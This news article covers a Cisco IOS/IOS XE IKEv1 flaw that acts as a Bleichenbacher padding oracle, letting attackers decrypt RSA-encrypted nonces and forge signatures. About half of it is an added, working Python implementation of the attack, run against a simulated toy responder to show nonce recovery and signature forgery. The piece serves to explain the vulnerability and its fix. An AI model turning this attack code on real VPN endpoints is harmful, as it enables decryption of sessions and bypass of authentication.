Cisco has issued a patch for Cisco IOS and IOS XE Software to close a vulnerability that lets attackers break the RSA-based cryptography protecting IKE VPN connections.
On Monday, the tech giant said in a security advisory that the vulnerability affects IOS Software, originally short for Internetwork Operating System, and IOS XE Software on devices with an ISAKMP policy configured with the authentication rsa-encr option, which is not the default. Cisco IOS XR Software is not affected.
The vulnerability allows an unauthenticated, remote attacker to recover the nonces of an Internet Key Exchange Version 1 (IKEv1) session even though they are sent RSA-encrypted, that is, to decrypt them without the device's private key.
The root cause is how the software handles decryption failures. When the responder treats a ciphertext that decrypts to a malformed PKCS#1 v1.5 block differently from one that decrypts cleanly, its behaviour acts as a padding oracle (a Bleichenbacher oracle): each crafted ciphertext sent to a device configured for IKEv1 with RSA-encrypted nonces yields one bit about the corresponding plaintext, and enough such queries (on the order of a million in Bleichenbacher's original 1998 analysis) let the attacker decrypt the nonces without ever learning the private key.
For operators, the practical check is whether any crypto isakmp policy uses authentication rsa-encr; only those devices expose the oracle.
Reporting the Flaw
The security flaw was reported by Dennis Felsch, Martin Grothe, and Jörg Schwenk of Ruhr-Universität Bochum, and by Adam Czubak and Marcin Szymanek of the University of Opole.
The Internet Key Exchange protocol (IKE) is used to build Virtual Private Networks (VPNs) by authenticating the peers and establishing the cryptographic keys for IPsec. The protocol exists in two versions, IKEv1 and IKEv2, which differ in their modes, phases, authentication methods, and configuration options.
According to the researchers, the Bleichenbacher oracle in IKEv1's RSA-encrypted-nonce mode does more than decrypt nonces: the same oracle can be used to compute RSA signatures with the device's private key. Because an RSA key pair is routinely reused across IKE versions and authentication modes, an oracle in one mode breaks authentication in the others, which amounts to a bypass of the protocol's authentication.
“Using this exploit, we break these RSA encryption based modes, and in addition break RSA signature-based authentication in both IKEv1 and IKEv2,” the researchers said.
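The two points above, a responder whose reaction to decryption failures leaks a padding oracle, and the reuse of that oracle to forge signatures under the same key pair, can be shown end to end in a toy. The following Python is an added example, not code from Cisco, the advisory, or the Bochum and Opole researchers. It models the vulnerable peer as a function that only reveals whether a submitted ciphertext decrypts to a block starting 0x00 0x02, runs Bleichenbacher's 1998 adaptive chosen-ciphertext attack against it to recover an RSA-encrypted nonce, and then runs the same attack on a PKCS#1 v1.5 signature block to produce a valid signature. The 128-bit key, the class and function names, the sample nonce and the signed payload are all hypothetical; a real IKEv1 responder also checks the rest of the padding, which changes how strict the oracle is but not the attack.

```python
"""Toy Bleichenbacher (1998) padding-oracle attack on PKCS#1 v1.5 RSA.
Added example, not Cisco's or the researchers' code.  The oracle is a responder
that reveals whether a ciphertext decrypts to a block starting 0x00 0x02; with
it an attacker decrypts an RSA-encrypted nonce and also forges an RSA signature
under the same key pair.  Toy 128-bit key; all names here are hypothetical."""
import hashlib
import random

def is_prime(n, bases=(2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)):
    """Miller-Rabin; these fixed bases are deterministic for n < 3.3e24 (all 64-bit n)."""
    if n < 2 or any(n % b == 0 for b in bases):
        return n in bases
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits, rng):
    """Toy RSA key; the top two bits of each prime are set so n has exactly `bits` bits."""
    half = bits // 2
    while True:
        p = rng.getrandbits(half) | (3 << (half - 2)) | 1
        q = rng.getrandbits(half) | (3 << (half - 2)) | 1
        if p != q and is_prime(p) and is_prime(q) and (p - 1) * (q - 1) % 65537:
            return p * q, 65537, pow(65537, -1, (p - 1) * (q - 1))  # n, e, d

def ceil_div(a, b):
    return -(-a // b)

class VulnerableResponder:
    """Stand-in for an IKEv1 peer whose reply differs when nonce decryption fails."""
    def __init__(self, n, d):
        self.n, self.d, self.queries = n, d, 0
        self.B = 1 << (8 * ((n.bit_length() + 7) // 8 - 2))
    def accepts(self, c):  # the single bit the attacker observes per query
        self.queries += 1
        return 2 * self.B <= pow(c, self.d, self.n) < 3 * self.B

def bleichenbacher(oracle, n, e, c):
    """Return c^d mod n using only oracle(c') -> bool (Bleichenbacher 1998)."""
    B = 1 << (8 * ((n.bit_length() + 7) // 8 - 2))
    def conforming(s):  # does c * s^e decrypt to a block starting 0x00 0x02?
        return oracle(c * pow(s, e, n) % n)
    s0 = 1  # step 1: blind until c*s0^e is conforming (s0 = 1 if c already is)
    while not conforming(s0):
        s0 += 1
    M, s = [(2 * B, 3 * B - 1)], ceil_div(n, 3 * B)  # step 2a: smallest useful s
    while not conforming(s0 * s):
        s += 1
    while True:
        new_M = set()  # step 3: narrow every interval that can still hold m*s0 mod n
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, ceil_div(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new_M.add((lo, hi))
        M = sorted(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:  # step 4: unblind and return
            return M[0][0] * pow(s0, -1, n) % n
        if len(M) > 1:  # step 2b: linear search for the next conforming s
            s += 1
            while not conforming(s0 * s):
                s += 1
        else:  # step 2c: each round roughly halves the remaining interval
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), n)
            while True:
                cands = range(ceil_div(2 * B + r * n, b), ceil_div(3 * B + r * n, a))
                s = next((x for x in cands if conforming(s0 * x)), None)
                if s is not None:
                    break
                r += 1

def demo(seed=1, bits=128):
    rng = random.Random(seed)  # fixed seed so the toy run is reproducible
    n, e, d = gen_key(bits, rng)
    k = (n.bit_length() + 7) // 8
    peer = VulnerableResponder(n, d)
    # (1) the nonce an IKEv1 initiator sends RSA-encrypted (EME-PKCS1-v1_5 block)
    nonce = bytes(rng.getrandbits(8) for _ in range(4))
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(nonce)))
    c = pow(int.from_bytes(b"\x00\x02" + ps + b"\x00" + nonce, "big"), e, n)
    block = bleichenbacher(peer.accepts, n, e, c).to_bytes(k, "big")
    recovered = block[block.index(b"\x00", 2) + 1:]
    # (2) a PKCS#1 v1.5 *signature* block (0x00 0x01 ...); hash truncated to fit the toy key
    h = hashlib.sha256(b"attacker-chosen IKE auth payload").digest()[:4]
    target = int.from_bytes(b"\x00\x01" + b"\xff" * (k - 3 - len(h)) + b"\x00" + h, "big")
    sig = bleichenbacher(peer.accepts, n, e, target)
    return nonce, recovered, pow(sig, e, n) == target, peer.queries
```

Calling demo() returns the original nonce, the recovered nonce, whether the forged signature verifies under the public key, and the total number of oracle queries; for this toy key each search step costs on the order of 2^16 queries, and that count is set by the ratio of the block bound B to the modulus, not by the key size, so a production 2048-bit key is no harder. The signature forgery needs the blinding step (step 1) because a signature block starts 0x00 0x01 and is not itself conforming; the nonce does not, because a well-formed encrypted nonce already is. The only fix that removes the oracle is to make the responder's observable behaviour independent of whether decryption succeeded; changing the error message, returning a different code, or dropping the packet all still leak the bit.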
The team also plans to outline an offline dictionary attack against Pre-Shared Key (PSK) IKE modes at the summit.